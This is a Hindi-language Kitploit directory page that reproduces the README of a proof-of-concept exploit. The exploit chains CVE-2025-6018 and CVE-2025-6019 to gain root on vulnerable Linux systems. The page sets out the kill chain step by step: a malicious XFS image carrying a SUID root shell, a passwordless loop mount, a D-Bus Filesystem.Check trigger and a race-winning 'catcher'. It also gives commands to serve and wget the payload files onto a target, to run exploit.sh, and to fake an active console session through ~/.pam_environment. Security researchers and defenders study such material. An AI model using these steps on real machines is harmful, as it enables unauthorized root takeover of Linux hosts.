Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-6018-6019-PoC — कमजोर Linux सिस्टम्स पर Local Privilege Escalation (LPE) प्राप्त करने के लिए CVE-2025-6018 (PAM/Polkit Active Session Bypass) और CVE-2025-6019 (libblockdev SUID Mount Flaw) को चेन करने का एक Proof of Concept। | Kitploit
उपकरण/GitHubGitHub/michaelventurella/cve-2025-6018-6019-poc
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHubmichaelventurella/cve-2025-6018-6019-poc

CVE-2025-6018-6019-PoC

कमजोर Linux सिस्टम्स पर Local Privilege Escalation (LPE) प्राप्त करने के लिए CVE-2025-6018 (PAM/Polkit Active Session Bypass) और CVE-2025-6019 (libblockdev SUID Mount Flaw) को चेन करने का एक Proof of Concept।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
1727 महीने पहलेअभी तक समीक्षित नहीं

CVE-2025-6018 और CVE-2025-6019: स्थानीय विशेषाधिकार वृद्धि (Local Privilege Escalation) का PoC

CVE-2025-6018 (PAM/Polkit सक्रिय सत्र बायपास) और CVE-2025-6019 (libblockdev SUID माउंट दोष) को जोड़कर कमजोर लिनक्स सिस्टम पर रूट एक्सेस प्राप्त करने के लिए एक मजबूत प्रूफ ऑफ कॉन्सेप्ट (PoC)।

अस्वीकरण

यह उपकरण केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा अनुसंधान के लिए है। इसे उन सिस्टमों पर उपयोग न करें जिनके आप मालिक नहीं हैं या जिनके परीक्षण की आपको स्पष्ट अनुमति नहीं है।


भेद्यता शृंखला (Vulnerability Chain)

यह एक्सप्लॉइट एक सामान्य उपयोगकर्ता से रूट तक विशेषाधिकार बढ़ाने के लिए दो तार्किक दोषों को जोड़ता है:

  1. CVE-2025-6018 (प्रवेश द्वार): PAM/Polkit में एक गलत कॉन्फ़िगरेशन दूरस्थ SSH सत्रों को Active=yes के रूप में चिह्नित करने की अनुमति देती है। यह चाल सिस्टम को यह विश्वास दिलाती है कि दूरस्थ उपयोगकर्ता भौतिक रूप से कंसोल पर मौजूद है, जिससे udisks2 जैसे हार्डवेयर प्रबंधन उपकरणों के लिए पासवर्ड की आवश्यकता समाप्त हो जाती है।
  2. CVE-2025-6019 (हथियार): libblockdev लाइब्रेरी (udisks2 द्वारा उपयोग की जाती है) रखरखाव संचालन (जैसे Check या Resize) के लिए अस्थायी रूप से फाइलसिस्टम माउंट करते समय nosuid सुरक्षा फ्लैग लागू करने में विफल रहती है।

किल चेन (Kill Chain)

  1. तैयारी: हम एक दुर्भावनापूर्ण XFS इमेज बनाते हैं जिसमें एक स्थिर SUID रूट शेल होता है।
  2. बायपास: हम इस इमेज को बिना पासवर्ड के लूप डिवाइस के रूप में माउंट करने के लिए Active=yes सत्र स्थिति पर भरोसा करते हैं।
  3. ट्रिगर: हम Filesystem.Check के लिए D-Bus कॉल जारी करते हैं। यह udisks2 को इमेज को सत्यापित करने के लिए अस्थायी रूप से माउंट करने के लिए मजबूर करता है। महत्वपूर्ण रूप से, इस अस्थायी माउंट में nosuid का अभाव होता है।
  4. रेस कंडीशन: एक संकलित C प्रोग्राम ("द स्नाइपर") वास्तविक समय में /proc/mounts की निगरानी करता है। जैसे ही अस्थायी माउंट दिखाई देता है, यह सिस्टम द्वारा अनमाउंट करने से पहले SUID पेलोड को निष्पादित करता है।

उपयोग

चरण 1: तैयारी (हमलावर मशीन)

क्योंकि लक्ष्य मशीन में अक्सर mkfs.xfs या gcc जैसे उपकरणों की कमी होती है, हम पेलोड को स्थानीय रूप से उत्पन्न करते हैं।

  1. Kali/Parrot पर बिल्ड स्क्रिप्ट चलाएं:

    root@kitploit:~
    ./build_poc.sh
    
    • exploit.img (SUID शेल के साथ 400MB XFS इमेज) बनाता है।
    • catcher (रेस-कंडीशन विजेता) संकलित करता है।
  2. फ़ाइलों को लक्ष्य पर अपलोड करें: एक Python सर्वर शुरू करें:

    root@kitploit:~
    python3 -m http.server 80
    

    लक्ष्य मशीन पर (उदाहरण के लिए, /tmp में):

    root@kitploit:~
    wget http://<YOUR_IP>/exploit.img
    wget http://<YOUR_IP>/catcher
    chmod +x catcher
    

चरण 2: शोषण (लक्ष्य मशीन)

  1. एक्सप्लॉइट स्क्रिप्ट डाउनलोड करें: इस रिपॉजिटरी से exploit.sh सामग्री को लक्ष्य मशीन पर सेव करें।

  2. एक्सप्लॉइट चलाएं:

    root@kitploit:~
    chmod +x exploit.sh
    ./exploit.sh
    
  3. रूट का आनंद लें: स्क्रिप्ट स्वचालित रूप से लूप डिवाइस सेट करेगी, बैकग्राउंड कैचर शुरू करेगी और भेद्यता को ट्रिगर करेगी। आपको तुरंत एक रूट शेल में ड्रॉप कर दिया जाना चाहिए।


समस्या निवारण

"लूप डिवाइस सेट करने के लिए प्रमाणीकरण आवश्यक है"

यदि स्क्रिप्ट पासवर्ड मांगती है, तो आपका SSH सत्र सक्रिय नहीं है। समाधान:

  1. ~/.pam_environment बनाएं:
    root@kitploit:~
    echo "XDG_SEAT=seat0" > ~/.pam_environment
    echo "XDG_VTNR=1" >> ~/.pam_environment
    
  2. लॉग आउट करें और फिर से लॉग इन करें।
  3. loginctl show-session $XDG_SESSION_ID | grep Active से सत्यापित करें। इसे Active=yes कहना चाहिए।

"रेस कंडीशन विफल / कोई शेल नहीं"

कमजोर विंडो केवल मिलीसेकंड चौड़ी होती है।

  • सुनिश्चित करें कि आप संकलित C कैचर (build_poc.sh में शामिल) का उपयोग कर रहे हैं, न कि Bash लूप का।
  • स्क्रिप्ट Filesystem.Check विधि का उपयोग करती है, जो Resize से अधिक विश्वसनीय है।

फ़ाइल मेनिफेस्ट

build_poc.sh (हमलावर पक्ष)

दुर्भावनापूर्ण इमेज के निर्माण को स्वचालित करता है और स्थिर बाइनरी को संकलित करता है।

exploit.sh (लक्ष्य पक्ष)

आर्केस्ट्रेटर। यह संभालता है:

  1. सक्रिय सत्र की जाँच करना।
  2. बैकग्राउंड में catcher शुरू करना।
  3. udisksctl के माध्यम से लूप डिवाइस सेट करना।
  4. D-Bus Filesystem.Check कॉल को ट्रिगर करना।

क्रेडिट

  • मूल खोज: Qualys Research Team (CVE-2025-6018, CVE-2025-6019) https://www.helpnetsecurity.com/2025/06/18/chaining-two-lpes-to-get-root-most-linux-distros-vulnerable-cve-2025-6018-cve-2025-6019/
टूल डाउनलोड करें